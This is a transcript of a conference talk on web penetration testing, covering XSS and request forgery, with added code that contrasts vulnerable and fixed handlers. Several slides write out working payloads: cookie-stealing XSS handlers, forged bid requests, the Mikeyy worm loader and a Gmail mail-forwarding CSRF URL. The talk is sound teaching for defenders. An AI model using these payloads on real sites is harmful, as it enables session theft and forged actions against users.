VodQA3_PenetrationTesting_AmitDhakkad
This was a full length talk presented by Amit Dhakkad in vodQA-3 : A QA Meet held in ThoughtWorks, Pune.

Published in: Technology
Transcript

  • 1. Amit Dhakad
    Application Developer
    Is considered a "survivor"
    Likes to read about black magic & illusions
  • 2. What, why and how's of Penetration Testing
    - Amit Dhakad, Developer
  • 3. What do I plan to cover?
    What is Penetration Testing?
    XSS: what is it? Types of XSS: reflected XSS, stored XSS
    Request Forgery: what is it? Types of request forgery: on-site request forgery, cross-site request forgery
    Demo
    Attack mechanisms
    Real world examples
    Why do we need to pay attention?
  • 4. Penetration Testing
    Simulating a malicious attack on a system in order to find its weaknesses before a real attacker does
  • 5. Cross-site scripting (XSS)
    Injecting JavaScript into a page through user-controllable fields, so that it runs in other users' browsers under the application's own origin
  • 6. Reflected XSS
    Injecting JavaScript through URL parameters that the page echoes back into its HTML without encoding
  • 7. Diagram courtesy: The Web Application Hacker's Handbook
  • 8. Attack: http://localhost:3000/pure-reflective-xss?query=title"onclick="window.location.href=('http://localhost:3000/log?message='%2Bdocument.cookie)
    The query value is echoed into an HTML attribute: the double quote closes that attribute, the rest injects an onclick handler, and when the victim clicks, the handler sends document.cookie to the attacker's /log endpoint (%2B is a URL-encoded +)
  • 9. Stored XSS
    Exploiting the server's ability to persist: the payload is saved (e.g. in a profile field) and served to every user who later views that page, so no crafted link has to be clicked
  • 10. Diagram courtesy: The Web Application Hacker's Handbook
  • 11. Attack: Image URL is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="window.location.href=('http://localhost:3000/log?message='+document.cookie)
    The profile's image URL is written into <img src="..."> without encoding, so the quote closes src and the injected onmouseover handler sends the cookie of everyone who hovers over the image to the attacker
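Added example (not code from the talk or its demo application): the attribute-context mistake behind both slide 8's reflected attack and slide 11's stored attack, written as a vulnerable render function beside an encoded one. The /pure-reflective-xss route, the query field and the image URL field follow the deck; the function names, the encoder, the URL normalisation and the crude handler check are assumptions made here. Run it with node.

```javascript
// Added example, not the talk's demo application: the attribute-context
// injection behind both of the deck's attacks (the ?query= echo and the stored
// image URL), next to the encoding and URL validation that neutralise it.
// Route and field names follow the deck; the render functions are assumed.

// Encode for a double-quoted HTML attribute value: the five characters that
// can close the value or start markup become entities.
function encodeForHtmlAttribute(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;' };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Reflected XSS: the search page echoes ?query= into an input's value attribute.
function renderSearchVulnerable(query) {
  return '<input name="query" value="' + query + '">';
}
function renderSearchSafe(query) {
  return '<input name="query" value="' + encodeForHtmlAttribute(query) + '">';
}

// Stored XSS: a profile "image url" is saved and later emitted into <img src>.
// Besides encoding, only http(s) URLs are kept, and the URL is re-serialised
// by the URL parser, which percent-encodes stray quotes (javascript: is rejected).
function normalizeImageUrl(url) {
  try {
    const u = new URL(url);
    return u.protocol === 'http:' || u.protocol === 'https:' ? u.href : '';
  } catch (_) {
    return '';
  }
}
function renderAvatarVulnerable(imageUrl) {
  return '<img src="' + imageUrl + '">';
}
function renderAvatarSafe(imageUrl) {
  return '<img src="' + encodeForHtmlAttribute(normalizeImageUrl(imageUrl)) + '">';
}

// Crude check used only to make the contrast testable: an on* event-handler
// attribute that begins right after a quote or whitespace, which the templates
// above never write themselves.
function hasInjectedHandler(html) {
  return /["'\s]on[a-z]+\s*=/i.test(html);
}

// Constructed payloads: the decoded forms of the deck's two attack strings.
const REFLECTED_PAYLOAD =
  'title"onclick="window.location.href=(\'http://localhost:3000/log?message=\'+document.cookie)';
const STORED_PAYLOAD =
  'http://www.myflorida.org.uk/images/disney_gif/Donald.gif"onmouseover="' +
  'window.location.href=(\'http://localhost:3000/log?message=\'+document.cookie)';

console.log(renderSearchVulnerable(REFLECTED_PAYLOAD)); // onclick handler injected
console.log(renderSearchSafe(REFLECTED_PAYLOAD));       // quotes arrive as &quot;
console.log(renderAvatarVulnerable(STORED_PAYLOAD));    // onmouseover handler injected
console.log(renderAvatarSafe(STORED_PAYLOAD));          // stray quote is %22 and then encoded
```

The encoder is the fix that matters: it is chosen by the output context (a double-quoted attribute here), not by what the input looks like. The URL normalisation is a second layer for the stored case, because an <img src> that accepts javascript: or data: would still be dangerous even with the quotes encoded.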
  • 12. Request Forgery
    Making the user's browser perform actions the user did not intend, using the session the browser already holds
  • 13. On-site Request Forgery (OSRF)
    The forged request is triggered from a page on the same domain (typically via stored, user-supplied content), so origin and Referer checks do not help
  • 14. Attack with XSS: Image URL is set to http://www.myflorida.org.uk/images/disney_gif/Donald.gif" onmouseover="var form=document.getElementById('new_bid'); form.bid_amount.value=100;form.submit();
    The injected script fills in the bid form and submits it; because it runs on the site's own origin it can also read any anti-CSRF token the form carries
  • 15. Attack without XSS: Image URL is set to /bids?bid[amount]=500&bid[auction_id]=1
    The browser fetches the image src, so merely viewing the page sends GET /bids with the victim's cookies and places a bid; this works because the endpoint changes state on a GET
  • 16. Cross-site Request Forgery (CSRF)
    The forged request is triggered from a page on a different domain; the browser still attaches the victim's cookies for the target site
  • 17. Same origin policy
    A page residing on one domain can cause an arbitrary request to be made to another domain, but it cannot itself process the data returned from that request (which is why CSRF works: the attacker only needs the request to be sent, not read).
    A page residing on one domain can load a script from another domain and execute it within its own context.
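Added example, not the talk's demo application, covering slides 12 to 17 (OSRF with and without XSS, CSRF, and why the same-origin policy does not stop a forged request): the /bids endpoint from slide 15 as a forgeable handler beside a hardened one, with the three requests from the slides replayed against both. The request and session shapes, the site origin, the token value and the field names are assumptions for this illustration.

```javascript
// Added example, not the talk's demo application: the /bids endpoint the deck
// attacks, first as a forgeable handler, then hardened. The request shape,
// session shape, route and field names are assumptions for this illustration.

const SITE_ORIGIN = 'http://localhost:3000'; // assumed origin of the auction site

// Constant-time comparison so the token check does not leak by timing.
function safeEqual(a, b) {
  if (typeof a !== 'string' || typeof b !== 'string' || a.length !== b.length) return false;
  let diff = 0;
  for (let i = 0; i < a.length; i++) diff |= a.charCodeAt(i) ^ b.charCodeAt(i);
  return diff === 0;
}

// Vulnerable: accepts GET or POST, merges query and body (Rails-style params),
// and trusts the session cookie alone. An <img src="/bids?..."> on-site or a
// form on another site both place a bid as the logged-in victim.
function handleBidVulnerable(req, session, auctions) {
  const p = Object.assign({}, req.query, req.body);
  auctions[p['bid[auction_id]']].bids.push({ user: session.user, amount: Number(p['bid[amount]']) });
  return { status: 200 };
}

// Hardened: state changes only on POST; the request must come from our own
// origin; the form must carry the per-session anti-CSRF token; input is validated.
function requestOrigin(req) {
  if (req.headers.origin) return req.headers.origin;
  const m = /^(\w+:\/\/[^/]+)/.exec(req.headers.referer || '');
  return m ? m[1] : '';
}
function handleBidSafe(req, session, auctions) {
  if (req.method !== 'POST') return { status: 405, error: 'state change requires POST' };
  if (requestOrigin(req) !== SITE_ORIGIN) return { status: 403, error: 'cross-origin request refused' };
  if (!safeEqual(req.body.csrf_token, session.csrfToken)) return { status: 403, error: 'missing or wrong CSRF token' };
  const amount = Number(req.body['bid[amount]']);
  const auction = auctions[req.body['bid[auction_id]']];
  if (!auction || !Number.isInteger(amount) || amount <= 0) return { status: 400, error: 'invalid bid' };
  auction.bids.push({ user: session.user, amount });
  return { status: 200 };
}

// Constructed scenario: one auction, one logged-in victim. A real session would
// hold a token from crypto.randomBytes(32).toString('hex'); this one is fixed.
const SESSION = { user: 'victim', csrfToken: 'constructed-session-token' };
function newAuctions() { return { '1': { bids: [] } }; }

// (a) OSRF without XSS: the stored image URL from slide 15 makes the victim's
//     browser GET /bids?bid[amount]=500&bid[auction_id]=1 while logged in.
//     The Referer is our own site, so an origin check alone cannot stop it.
const OSRF_GET = {
  method: 'GET',
  headers: { referer: SITE_ORIGIN + '/profile/attacker' },
  query: { 'bid[amount]': '500', 'bid[auction_id]': '1' },
  body: {},
};
// (b) CSRF: an auto-submitting form on the attacker's domain POSTs to /bids,
//     the pattern of the Gmail filter attack. No token, foreign Origin.
const CSRF_POST = {
  method: 'POST',
  headers: { origin: 'http://evil.example' },
  query: {},
  body: { 'bid[amount]': '500', 'bid[auction_id]': '1' },
};
// (c) The genuine bid form, which embeds the session's token.
const LEGIT_POST = {
  method: 'POST',
  headers: { origin: SITE_ORIGIN },
  query: {},
  body: { 'bid[amount]': '500', 'bid[auction_id]': '1', csrf_token: SESSION.csrfToken },
};

// Run the three requests through a handler and report what got through.
function runScenario(handler) {
  const auctions = newAuctions();
  const statuses = [OSRF_GET, CSRF_POST, LEGIT_POST].map((r) => handler(r, SESSION, auctions).status);
  return { statuses, bidsPlaced: auctions['1'].bids.length };
}

console.log('vulnerable:', runScenario(handleBidVulnerable)); // all three place a bid
console.log('hardened: ', runScenario(handleBidSafe));        // only (c) does
```

Two caveats a tester should keep in mind. The token does nothing against slide 14's "attack with XSS": script running on the same origin can read the hidden csrf_token field and submit the form itself, which is why the XSS has to be fixed first. And the Origin/Referer check is defence in depth only; some clients and privacy tools strip Referer, so rejecting on it alone produces false positives, and it never stops the on-site case.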
  • 18. What can you do with XSS and Request Forgery?
    Session hijacking (stealing the session cookie)
    Performing arbitrary actions as the victim
    Disclosure of user data
  • 19. Real world attacks
  • 20. MySpace worm by Samy (XSS + OSRF)
    Bypassed all of MySpace's filters and added a script to his profile
    The script did two things whenever someone viewed an infected profile:
      Added Samy as a friend of the visiting user
      Copied itself into the visiting user's profile
    Anyone visiting the newly infected user's profile was infected in turn and also added Samy as a friend
  • 21. Protection:
  • 22. MySpace strips out the word "onreadystatechange", which is necessary to handle the response of an XMLHttpRequest
  • 23. Attack:
  • 24. eval('xmlhttp.onread' + 'ystatechange = callback');
    The banned word is only assembled at run time, inside the victim's browser, so a filter that searches the stored profile text never sees it
  • eBay – discovered by Dave Armstrong (OSRF)
    A crafted URL set as an item's image URL
    An arbitrary bid was placed on behalf of the visiting user
  • 25. Mikeyy Twitter worm (XSS + OSRF)
    Written by a 17-year-old
    Payload: "><title><script>document.write(String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>
    The String.fromCharCode call decodes to: <script src="http://www.stalkdaily.com/ajax.js"></script>
    Visiting users got infected
    Infected users began tweeting unwittingly, which spread the worm further
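Added example, not MySpace's, Twitter's or the speaker's code, for the filter-evasion tricks on slides 24 and 25: a banned-word filter that misses both the concatenated onreadystatechange and the String.fromCharCode-encoded script tag, and a normaliser that folds both constructs before matching. The banned-word list is constructed for this illustration; the two payload constants are built from the strings on the slides.

```javascript
// Added example, not MySpace's or Twitter's code: a banned-word filter of the
// kind the deck says MySpace used, the two evasions shown in the talk, and a
// normaliser that folds string concatenation and String.fromCharCode() before
// matching, so the filter sees what eval() or document.write() would produce.
// The banned-word list and both payload strings are constructed for this illustration.

const BANNED = ['onreadystatechange', 'script src=', 'document.cookie'];

// Naive filter: case-insensitive substring match against the raw input.
function naiveBlocked(input) {
  const s = input.toLowerCase();
  return BANNED.some((w) => s.includes(w));
}

// Fold String.fromCharCode(60,115,...) into the characters it yields and
// 'a' + 'b' into 'ab', repeating until nothing changes.
function normalize(input) {
  let s = input;
  let prev;
  do {
    prev = s;
    s = s.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_, list) =>
      "'" + list.split(',').map((n) => String.fromCharCode(Number(n))).join('') + "'");
    s = s.replace(/(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3/g, (_, q, a, __, b) => q + a + b + q);
  } while (s !== prev);
  return s;
}
function normalizedBlocked(input) {
  return naiveBlocked(normalize(input));
}

// Samy's evasion (slide 24): the banned word is split and joined at run time.
const SAMY_PAYLOAD = "eval('xmlhttp.onread' + 'ystatechange = callback');";

// Mikeyy's evasion (slide 25): the <script src=...> tag is hidden as character codes.
const MIKEYY_PAYLOAD =
  '"><title><script>document.write(String.fromCharCode(' +
  '60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,' +
  '119,119,119,46,115,116,97,108,107,100,97,105,108,121,46,99,111,109,47,' +
  '97,106,97,120,46,106,115,34,62,60,47,115,99,114,105,112,116,62));</script>';

for (const p of [SAMY_PAYLOAD, MIKEYY_PAYLOAD]) {
  console.log({ naive: naiveBlocked(p), normalized: normalizedBlocked(p) });
  console.log(normalize(p)); // what the browser actually executes
}
```

The normaliser catches exactly the two tricks on the slides and nothing more: ['onread','ystatechange'].join(''), unescape('%6Fnread...'), or a comment inside the name all slip past it, and every new trick needs a new rule. That is the practical reason slide 27 says the technologies don't provide strong protection: a blocklist on stored input is a losing game, and the durable fix is context-aware output encoding (or an allowlist sanitiser for fields that must carry HTML), which makes the payload inert however it is spelled.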
  • 26. Gmail vulnerability – discovered by Petko Petkov (CSRF)
    http://www.gnucitizen.org/util/csrf?_method=POST&_enctype=multipart/form-data&_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf&cf2_emc=true&cf2_email=evilinbox@mailinator.com&cf1_from&cf1_to&cf1_subj&cf1_has&cf1_hasnot&cf1_attach=true&tfi&s=z&irf=on&nvp_bu_cftb=Create%20Filter
    A cross-site multipart POST to Gmail's filter-creation form adds a filter that forwards all incoming mail to the attacker's address; the victim's browser sends it with their Gmail session cookie attached
  • 27. Why do we need to pay attention?
    The shift is towards attacking clients (browsers and their users) rather than servers
    The technologies in use don't provide strong protection by default
    These are often dismissed as "lame" attacks
    Identifying them with automated tools is difficult
    Penetration testing is treated as a separate vertical rather than part of everyday development and QA
  • 28. Break your own walls before anyone else does
  • 29. Q & A
  • 30. Thank you
